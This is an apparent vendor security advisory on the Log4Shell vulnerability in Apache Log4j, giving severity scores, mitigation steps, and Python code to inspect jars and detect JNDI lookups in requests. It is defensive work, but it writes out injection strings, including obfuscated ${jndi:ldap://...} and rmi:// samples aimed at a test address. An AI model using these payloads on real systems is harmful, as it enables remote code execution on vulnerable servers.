Indusface

Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

What is Apache Log4j Remote Code Execution (CVE-2021-44228) Vulnerability?

Log4j 2 is a logging library used in many Java applications and services. The library is part of the Apache Software Foundation’s Apache Logging Services project. A remote code execution vulnerability exists in Apache Log4j 2 versions 2.0-beta9 through 2.14.1: the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP (or other JNDI) server when message lookup substitution is enabled, which it is by default in those versions. This vulnerability is also known as “Log4Shell”.

What Are the Risks?

A remote attacker can exploit the vulnerability without authentication, and successful exploitation can grant full control of the victim’s system. The vulnerability is known to be actively exploited in the wild, and public proof-of-concept exploits are available.

Severity: Critical
CVSSv3.1: Base Score: 10.0 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv2: Base Score: 9.3 HIGH
Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)

Exploit available in public: Yes
Exploit complexity: Low

Do You Need to Worry About It?

The vendor has released a security patch, and we strongly advise customers to update their installations as soon as possible. Note that log4j-core is usually bundled inside application archives (WAR/EAR/fat JARs) and third-party products rather than installed system-wide, so every application and vendor product that embeds it has to be inventoried and updated separately.

Mitigation Steps

1) Upgrade to Log4j 2.15.0 or later; the vulnerability is patched from that version (see the successor vulnerabilities below for why 2.16.0 or later is the better target).
2) If you are running a vulnerable version from 2.10 up to 2.14.1 and cannot upgrade, set the following JVM system property at startup (the property does not exist in releases older than 2.10):

-Dlog4j2.formatMsgNoLookups=true

Alternatively, the same setting can be applied through an environment variable (again only effective on 2.10 and later):

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Note that this setting does not cover the follow-up issue CVE-2021-45046 described below, so it should be treated as a stop-gap rather than a fix.

3) For versions older than 2.10, or as an additional measure on any vulnerable version, remove the JndiLookup class from log4j-core with a command such as:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

The application (JVM) must be restarted for either step 2 or step 3 to take effect.
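The three steps above can be checked programmatically. The following Python script is an added example written for this page, not Indusface’s or Apache’s code: it reads the version from a log4j-core jar’s Maven pom.properties (real log4j-core jars carry it at META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties), checks whether JndiLookup.class is present, decides which mitigation applies, and performs the equivalent of the zip -d step in pure Python. The sample jar it builds is a constructed stand-in, not a real Log4j build. The cut-offs 2.15.0 and 2.16.0 are the ones given on this page; the 2.10 lower bound for the formatMsgNoLookups property comes from Apache’s advisory.

```python
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(ver):
    """'2.14.1' -> (2, 14, 1, 0). A pre-release such as '2.0-beta9' gets a
    trailing -1 so that it sorts below the final release with the same number."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-.+)?$", ver)
    if not m:
        return None
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if suffix is None else -1)


def inspect_log4j_core(jar_bytes):
    """Classify one log4j-core jar (given as bytes) against the mitigation steps above."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    v = parse_version(version) if version else None
    if v is None:
        status = "unknown-version"          # decide from has_jndi_lookup instead
    elif v >= (2, 16, 0, 0):
        status = "fixed"                    # lookups removed, JNDI off by default
    elif v >= (2, 15, 0, 0):
        status = "patched-for-CVE-2021-44228-but-CVE-2021-45046-in-non-default-configs"
    elif has_jndi:
        status = "vulnerable"
    else:
        status = "mitigated-jndilookup-removed"  # step 3 already applied
    return {
        "version": version,
        "has_jndi_lookup": has_jndi,
        "status": status,
        # step 2 (formatMsgNoLookups) only exists from 2.10; older releases need step 3
        "property_mitigation_applies": v is not None and (2, 10, 0, 0) <= v < (2, 15, 0, 0),
    }


def strip_jndi_lookup(jar_bytes):
    """Python equivalent of: zip -q -d log4j-core-*.jar <JndiLookup.class>.
    Rebuilds the archive without that one entry and returns the new bytes."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def make_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar (not a real Log4j build):
    only the entries this script looks at, with dummy class-file bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(POM_PROPERTIES, f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.0-beta9", "2.9.1", "2.14.1", "2.15.0", "2.16.0"):
        print(ver, inspect_log4j_core(make_sample_jar(ver)))
    print("after strip", inspect_log4j_core(strip_jndi_lookup(make_sample_jar("2.14.1"))))
```

A real inventory scanner has to recurse into WAR/EAR/fat JARs and shaded jars, where log4j-core is normally embedded, and should not trust the version string alone: check the class list as well, because a jar that has had JndiLookup.class stripped still reports its original version, and a repackaged jar may carry no pom.properties at all.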

Product Coverage:

Indusface AppTrana blocks exploits targeting the Log4j vulnerability (CVE-2021-44228), and customers behind the AppTrana WAF are protected. We still highly recommend that customers take the mitigation steps above, since a WAF only covers traffic that passes through it. Protection against this vulnerability was rolled out on December 11, 2021.

Indusface WAS can now detect Log4j vulnerabilities. Given the nature of the vulnerability, the detection is out of band: the scanner injects the attack vector, but the vulnerable code path may not run immediately; it may only run the next time the application logs the injected value. Reporting of the vulnerability is therefore also out of band.

When the vulnerability is identified, a notification will show up in the portal identifying which assets are affected, and an email will also be sent. A subsequent scan of the asset will update the report with additional details.

Further Details on Log4j Detection:

As already mentioned, the vulnerability results from how log messages are handled by the Log4j message processor. When an attacker passes a crafted message such as ${jndi:ldap://<serveraddress>/a} in any input that the application logs (a User-Agent header, a form field, a username), Log4j resolves the lookup by contacting the remote LDAP server, which can respond with a reference to malicious code that is then executed on your server, resulting in remote code execution.

To detect whether an application is vulnerable, the Indusface WAS scanner sends a crafted message to the application. If the application is vulnerable, the JNDI call is made to a listener that we control, where it is tracked and logged. If the call arrives, we know the application is vulnerable. Our intent is to identify the vulnerability, not to exploit it, so we do not respond with code or complete an RCE; we report that your server is vulnerable to an RCE exploit.
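To see why a simple string match on ${jndi: is not enough for either a WAF or a scanner, here is an added example (written for this page, not Indusface’s WAS or AppTrana logic) that evaluates nested lookups the way Log4j’s substitutor does before checking for a JNDI lookup. It implements only the pieces needed to show the obfuscation patterns seen in the wild (the lower and upper lookups and the :- default-value syntax) and treats any other lookup as failing to resolve, which is an assumption; the request headers and parameters are constructed samples using a TEST-NET address, not captured traffic.

```python
import re
import urllib.parse
from typing import Optional

# An innermost lookup: "${" ... "}" whose body contains neither "${" nor "}".
INNERMOST_LOOKUP = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")


def resolve_lookup(body: str) -> Optional[str]:
    """Evaluate one ${...} body approximately as Log4j's StrSubstitutor/Interpolator
    would. Returns None when the body is a jndi lookup (the dangerous case),
    otherwise the text that replaces the lookup."""
    name, default = body, None
    i = body.find(":-")                  # Log4j's default-value delimiter
    if i != -1:
        name, default = body[:i], body[i + 2:]
    prefix, _, key = name.partition(":")
    if prefix == "jndi":
        return None
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    # env, sys, date, hostName, ctx, ...: their values depend on the target host and a
    # scanner cannot know them. ASSUMPTION for detection: the lookup fails, so Log4j
    # falls back to the default value, and we substitute nothing when there is none.
    return default if default is not None else ""


def find_jndi(text: str, max_rounds: int = 256) -> Optional[str]:
    """Return the resolved ${jndi:...} lookup that evaluating `text` would reach,
    or None. Resolves innermost lookups first, as Log4j does, so obfuscation such as
    ${${lower:j}ndi:...} or ${::-$}{jndi:...} collapses to the plain form.
    Percent-decoding is applied once because a WAF sees URL-encoded payloads."""
    s = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        m = INNERMOST_LOOKUP.search(s)
        if m is None:
            return None
        value = resolve_lookup(m.group(1))
        if value is None:
            return m.group(0)
        # Every round removes "${" and "}" and inserts at most the body, so the
        # string strictly shrinks and the loop terminates; the bound is a safety net.
        s = s[:m.start()] + value + s[m.end():]
    return "<lookup nesting limit exceeded>"   # pathological input: treat as suspicious


def scan_request(headers: dict, params: dict) -> list:
    """Check every attacker-controlled value an application might log."""
    hits = []
    for where, values in (("header", headers), ("param", params)):
        for name, value in values.items():
            found = find_jndi(value)
            if found is not None:
                hits.append((where, name, found))
    return hits


# Constructed sample request (not real traffic); 203.0.113.0/24 is TEST-NET-3.
SAMPLE_REQUEST_HEADERS = {
    "User-Agent": "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.5:1389/a}",
    "X-Forwarded-For": "${::-$}{jndi:rmi://203.0.113.5:1099/x}",
    "Referer": "https://example.com/%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D",
    "Accept": "text/html",
}
SAMPLE_PARAMS = {
    "q": "${${env:NOPE:-j}ndi:ldap://203.0.113.5/b}",
    "page": "${date:yyyy-MM-dd}",       # a lookup, but a harmless one
}

if __name__ == "__main__":
    for where, name, found in scan_request(SAMPLE_REQUEST_HEADERS, SAMPLE_PARAMS):
        print(f"{where} {name}: resolves to {found}")
```

The example deliberately stops at the resolved ${jndi:...} string: like the WAS scanner described above, a detector only needs to know that a JNDI lookup would be reached, not to serve a payload. Double URL-encoding, other lookups whose output is predictable, and payloads split across several logged fields are not handled here and are the kind of gap a production rule set has to close.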

Successors of Log4Shell:

Apache announced another vulnerability in Log4j on December 14, 2021, tracked as CVE-2021-45046. The fix for Log4Shell in 2.15.0 was incomplete in certain non-default configurations (a Pattern Layout with a Context Lookup such as ${ctx:loginId}), allowing an attacker who controls Thread Context Map data to craft input that causes a denial of service. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default, but Log4j 2.16.0 fixes the issue by removing support for message lookup patterns and disabling JNDI functionality by default. We recommend that customers upgrade to the latest version of Log4j.

Also, researchers from Praetorian disclosed a third, separate weakness in Log4j 2.15.0 that can allow attackers to exfiltrate sensitive data in certain circumstances. Technical details and a PoC were not disclosed publicly, as part of responsible disclosure. As of December 16, 2021, the vendor had not disclosed any details of the vulnerability or a patch.

Update on Feb 17: Added coverage for Indusface WAS and details on the successors of Log4Shell.


Vivek Gopalan

Vivekanand Gopalan is a seasoned entrepreneur and currently serves as the Vice President of Products at Indusface. With over 12 years of experience in designing and developing technology products, he has a keen eye for building innovative solutions that solve real-life problems. In his previous role as a Product Manager at Druva, Vivek was instrumental in creating the core endpoint data protection solution which helped over 1500 enterprises protect over a million endpoints. Prior to that, he served as a Product Manager at Zighra, where he played a crucial role in reducing online and offline payment fraud by leveraging mobile telephony, collective intelligence, and implicit user authentication. Vivek is a dynamic leader who enjoys building and commercializing products that bring tangible value to customers. In 2010, before pursuing MBA, he co-founded a technology product company, Warmbluke and created a first-of-its-kind innovative Civil Engineering estimator software called ATLAS. The software was developed for both enterprise and for SaaS users. The product helps in estimating the construction cost using CAD drawings. Vivek did his MBA from Queen's University with Specialization in New Ventures. He also holds a Bachelor of Technology degree in Information Technology from Coimbatore Institute of Technology, Anna University, one of the prestigious universities in India. He is the recipient of the D.D. Monieson MBA Award, Issued by Queen's School of Business, presented to a student team which has embraced the team-learning model and applied the management tools and skills to become a peer exemplar. In his spare time, Vivek likes to go on hikes and read books.

This post was last modified on March 16, 2023 16:34
